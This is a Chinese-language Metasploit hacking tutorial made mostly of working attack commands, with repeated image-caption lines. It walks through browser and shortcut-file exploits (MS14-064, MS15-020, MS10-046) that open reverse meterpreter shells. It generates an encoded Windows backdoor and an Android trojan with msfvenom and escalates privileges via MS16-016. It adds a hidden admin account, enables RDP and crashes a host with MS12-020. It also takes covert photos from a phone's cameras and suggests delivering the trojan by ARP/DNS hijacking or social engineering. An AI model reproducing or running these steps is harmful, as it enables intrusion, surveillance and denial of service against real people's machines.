Kali Linux实战篇:Metasploit渗透测试与提权实战教程

Microsoft Windows OLE远程代码执行漏洞,OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术,

远程攻击者利用此漏洞通过构造的网站执行任意代码,影响Win95+IE3 – Win10+IE11全版本...

metasploit里已经加入了此漏洞的利用模块 :exploit/windows/browser/ms14_064_ole_code_execution

执行命令:

msfconsole //启动MSF

search ms14 //搜索关键字

use exploit/windows/browser/ms14_064_ole_code_execution // 加载漏洞利用模块

set payload windows/meterpreter/reverse_tcp //设置反弹连接shell

如图:

Kali Linux实战篇:Metasploit渗透测试与提权实战教程

需要注意的是箭头标记的属性默认为false 需要设置为true ,因为msf中自带的漏洞利用exp调用的是 powershell,

所以msf(Metasploit Framework)中的exp代码只对安装powershell的系统生效。win7系统安装自带powershell,

所以我们这里测试受害的机器为windows7 32位.

按照图中各个属性配置好后 执行exploit即可

Kali Linux实战篇:Metasploit渗透测试与提权实战教程

到一个URL地址,复制到受害者机器(win7)测试

当用户点击允许了后

可以看见这边反弹了一个shell,接下里我们就可以随便玩了,

测试成功,结束。

用MSF进行提权

在WEB渗透中当我们拿到webshell了,我们可以试试用MSF(metasploit)来进行提权,在MSF里meterpreter很强大的!

我们先用msfvenom生成一个EXE的木马后门。

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\\x00' LHOST=192.168.1.7 LPORT=4444 -f exe > abc.exe

然后在到MSF根据刚才配置的木马后门进行监听...

然后在把木马上传到服务器(受害者)的机器里,必须上传到可读可写的目录下哦,

Kali Linux实战篇:Metasploit渗透测试与提权实战教程
Kali Linux实战篇:Metasploit渗透测试与提权实战教程

比如这里我吧abc.exe上传到了C:\\users\leak\desktop\目录下,

abc.exe就是我刚才生成的后门。

Kali Linux实战篇:Metasploit渗透测试与提权实战教程

然后在执行我们的后门,可以看见MSF弹回了一个session 1(会话连接)。

说明我们后门程序成功执行起来了,当然你也可以在webshell执行的,

但必须的有一点执行的权限哦。

Kali Linux实战篇:Metasploit渗透测试与提权实战教程

getuid //可以看见我们的权限很低的,一般都是user权限的,但也遇到过某些服务器执行后就直接是system最高权限。像这种我们就直接加用户啦。

这里我们是user权限,我们要把它提升到system权限。Windows最高权限。

Kali Linux实战篇:Metasploit渗透测试与提权实战教程

接着我们输入命令

background //把你当前的metasploit shell转为后台执行。

search ms16 // 搜索关键字相关的漏洞

.....然后我选择了MS16-016这个漏洞在进行提权

use exploit/windows/local/ms16_016_webdav // 选择漏洞

Kali Linux实战篇:Metasploit渗透测试与提权实战教程

show options //查看漏洞里边要设置的参数

可以看见只有一个SESSION参数要设置

Kali Linux实战篇:Metasploit渗透测试与提权实战教程

set SESSION 1 // 设置会刚才我们后门连接的ID号 1

exploit //执行提权...

可以看见成功的吧漏洞利用到了PID为692的进程中...

虽然提权成功了 但你getuid下还是看见的是user权限

Kali Linux实战篇:Metasploit渗透测试与提权实战教程

ps一下查看进程

根据刚才的提示找到PID 692的进程

可以看见确实是system权限

Kali Linux实战篇:Metasploit渗透测试与提权实战教程

所以我们还要用到migrate 命令 //迁移到一个指定的进程ID。

migrate 692 //

在getuid下可以看见为system权限啦

提权成功了

Kali Linux实战篇:Metasploit渗透测试与提权实战教程

既然有了system权限 那我们在添加账号hack

添加为管理员组

Kali Linux实战篇:Metasploit渗透测试与提权实战教程

用Nmap扫下并没有开启远程登陆3389

Kali Linux实战篇:Metasploit渗透测试与提权实战教程

run getgui -e //开启目标主机3389 貌似这条MSF命令只对2003的系统有效 执行几次都没成功

所以就用cmd命令开了3389端口

Kali Linux实战篇:Metasploit渗透测试与提权实战教程

提权成功,登录服务器。。。。

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

MS15-020漏洞测试

名称:Microsoft DLL植入远程代码执行漏洞(CVE-2015-0096)(MS15-020)

了解:Microsoft Windows没有正确处理DLL文件的加载,存在远程代码执行漏洞,通过诱使用户打开远程WebDAV或SMB共享上的某些文件利用此漏洞,

成功利用后可导致加载任意库。Windows使用.lnk来定义文件或者目录的快捷方式,可以使用.CPL文件来自定义图标。问题是,在Windows中,图标从模块(或者可执行文件或动态链接库)加载。

事实上,.cpl文件实际上是DLL文件。因为攻击者可以定义哪些可执行模块会被加载,攻击者可以利用.LNK文件来执行任意代码。

实验环境:

共享主机win7:192.168.1.3

入侵主机linux:192.168.1.7

受害者主机XP:192.168.10

打开终端输入命令:

msfconsole //启动msf(metasploit framework)

Kali Linux实战篇:Metasploit渗透测试与提权实战教程

search ms15 //搜索关键字相关漏洞

use exploit/windows/fileformat/ms15_020_shortcut_icon_dllloader //漏洞利用模块

info //查看漏洞相关信息

set payload windows/meterpreter/reverse_tcp //设置一个反弹shell

Kali Linux实战篇:Metasploit渗透测试与提权实战教程

设置好参数,设置漏洞利用模块列表的UNCHOST和UNCSHARE

set UNCHOST 192.168.1.3 //我设置为我的另一台主机地址 就是你开着共享那台机器的地址

set UNCSHARE share //设置共享文件的文件夹 这里主机192.168.1.3在C盘下的share里文件夹开启了共享 提前创建好共享

set LHOST 192.168.1.7 //设置漏洞成功利用后后门连接的地址

exploit //执行漏洞

Kali Linux实战篇:Metasploit渗透测试与提权实战教程

exploit后会发现生成了几个文件,

我们去生成的目录下把文件拷贝到共享主机的共享文件夹下

Kali Linux实战篇:Metasploit渗透测试与提权实战教程

复制到共享主机后,在启动MSF进行配置刚才的后门进行监听...输入命令

1. use exploit/multi/handler

2. set payload windows/meterpreter/reverse_tcp

3. set LHOST 192.168.1.7

4. exploit

Kali Linux实战篇:Metasploit渗透测试与提权实战教程

受害者访问共享后,

成功了触发了漏洞

Kali Linux实战篇:Metasploit渗透测试与提权实战教程

可以发现入侵者这边弹回来了一个回话session 1,简单点说就是一个后门,这里我顺便提了下权,可以看见system权限。

实验结束,下班,关门,回家。

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

MS10-046漏洞测试

这次用到MS10-046这个远程执行漏洞(Windows快捷方式LNK文件自动执行代码漏洞攻击)

命令:

1. msfconsole //启动MSF Metasploit

2. search ms10-046 //搜索漏洞

3. use windows/browser/ms10_046_shortcut_icon_dllloader //加载漏洞模块

4. set payload windows/meterpreter/reverse_tcp //设置一个PAYLOAD为反弹连接shell

5. show options //查看相关设置

6. set SRVHOST 192.168.1.10 //设置攻击者自身IP

7. set LHOST 192.168.10 //设置反弹连接回来的IP (攻击者自身IP)

8. exploit //开始执行漏洞...

Kali Linux实战篇:Metasploit渗透测试与提权实战教程

会生成一个URL连接 复制这个地址 去另一台XP系统机器上测试 用浏览器打开会跳到共享文件夹下

Kali Linux实战篇:Metasploit渗透测试与提权实战教程

然后我们在来到MSF终端看见漏洞执行成功了 有一个连接会话 ID 1

命令 :

sessions -l 查看存在的会话

sessions -i 1 选着会话1

Kali Linux实战篇:Metasploit渗透测试与提权实战教程

输入ps命令查看进程 或者 输入run vnc 查看远程桌面 等等

Kali Linux实战篇:Metasploit渗透测试与提权实战教程
Kali Linux实战篇:Metasploit渗透测试与提权实战教程

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

MS12-020远程桌面协议RDP拒绝访问漏洞

条件:受害者必须开放RDP协议 开放了3389端口 或者端口改了,知道对方RDP开放的对应端口。

过程:MSF利用

Kali Linux实战篇:Metasploit渗透测试与提权实战教程
Kali Linux实战篇:Metasploit渗透测试与提权实战教程

MSF显示为seems down说明目标已经被攻击。如图已经蓝屏。

Kali Linux实战篇:Metasploit渗透测试与提权实战教程

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

MSF入侵安卓手机

MSF是Metasploit的简称,Metasploit是一款开源的安全漏洞检测工具,非常强大,分别有Windows版和Linux版,工具里集成了许多微软公布的漏洞(0day)。

我这里做测试的系统是Backbox linux ,这是一款网络渗透,信息安全评估系统。里边安装了许许多多的工具。其中MSF就自带有。当然还有其它的 比如Kali linux 、Back Track这些等等。

环境:Backbox linux+MSF

目标:一台安卓手机

既然是入侵安卓手机,肯定要先配置一个安卓木马,那我们看看本机的IP

Kali Linux实战篇:Metasploit渗透测试与提权实战教程

本机IP:192.168.1.6

在到终端输入命令:msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=5555 R > /root/apk.apk

以前的MSF老版本是用msfpayload生成木马 现在在新版本中都用msfvenom代替了,所以有些朋友在终端输入msfpayload的时候 会提示

msfpayload无法找到命令 所以使用msfvenom即可,这里LHOST 对应的是本机的IP地址 LPORT对应你要监听的端口 然后生成木马的路径

Kali Linux实战篇:Metasploit渗透测试与提权实战教程

这样我们就在/root/路径下生成了一个APK的安卓木马文件,至于木马的免杀暂且不谈。现在我们在来启动MSF工具

输入命令:msfconsole

Kali Linux实战篇:Metasploit渗透测试与提权实战教程

然后输入:

1. use exploit/multi/handler 加载模块

2. set payload android/meterpreter/reverse_tcp 选择Payload

3.show options 查看参数设置

Kali Linux实战篇:Metasploit渗透测试与提权实战教程

我们看见payload里边有两个参数要设置 LHOST和LPORT 表示地址和端口 默认的端口是4444 现在我们来更改设置

1.set LHOST 192.168.1.6 这里的地址设置成我们刚才生成木马的IP地址

2.set LPORT 5555 这里的端口设置成刚才我们生成木马所监听的端口

3.exploit 开始执行漏洞 开始监听...

Kali Linux实战篇:Metasploit渗透测试与提权实战教程

OK,一切准备工作准备就绪。。。现在要做的就是把木马文件搞到人家的手机上,思路有很多 可以DNS arp劫持欺骗 只要对方用手机下载文件 就会下载我们的木马文件

还有社工什么等等的,这里我就简单的把木马文件弄我自己的手机上做测试

Kali Linux实战篇:Metasploit渗透测试与提权实战教程
Kali Linux实战篇:Metasploit渗透测试与提权实战教程
Kali Linux实战篇:Metasploit渗透测试与提权实战教程

安装完成后 会在桌面上生成一个MainActivity的程序图标 这个就是我们刚才生成的木马 当我们点击了这个图标 手机会没有任何反应 其实木马已经开始运行起来了

我们可以在我们的MSF里看见有一个会话连接了

Kali Linux实战篇:Metasploit渗透测试与提权实战教程

这样对方的手机就就被我们控制了,查看手机系统信息,输入命令 sysinfo

webcam_list查看手机摄影头有几个 这里显示两项 分别表示有前后两个摄像头

Kali Linux实战篇:Metasploit渗透测试与提权实战教程
Kali Linux实战篇:Metasploit渗透测试与提权实战教程

webcam_snap 隐秘拍照功能

后边跟上参数-i 指定使用那个摄像头拍照

可以看见我们分别对前后摄像头都拍了照 保存到了桌面上

还可以输入命令 webcam_stream 开启摄像头